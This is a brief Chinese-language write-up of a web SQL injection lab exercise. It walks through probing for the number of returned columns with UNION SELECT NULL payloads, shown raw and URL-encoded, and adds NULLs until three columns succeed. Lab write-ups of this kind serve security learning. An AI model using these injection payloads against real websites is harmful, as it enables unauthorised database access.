Web SQL injection Lab7

# Web SQL injection Lab7 本題要找出回傳的欄位數，一樣先進到網站裡。 ![image](https://hackmd.io/_uploads/Sk00nMVmgl.png) 先攔截請求並修改。 ``` ' UNION SELECT NULL-- ``` ![image](https://hackmd.io/_uploads/H1scTGE7xg.png) 會發現直接輸入的話會出錯（沒有反紅），所以我嘗試改成 URL 編碼來解決這個問題。 ``` %27%20UNION%20SELECT%20NULL-- ``` ![image](https://hackmd.io/_uploads/Bk_m0MEXlx.png) 發現改成 URL 編碼還是出錯，因此我嘗試增加欄位數。 ``` s%27%20UNION%20SELECT%20NULL,NULL,NULL-- ``` ![image](https://hackmd.io/_uploads/H1w5AMVXlx.png)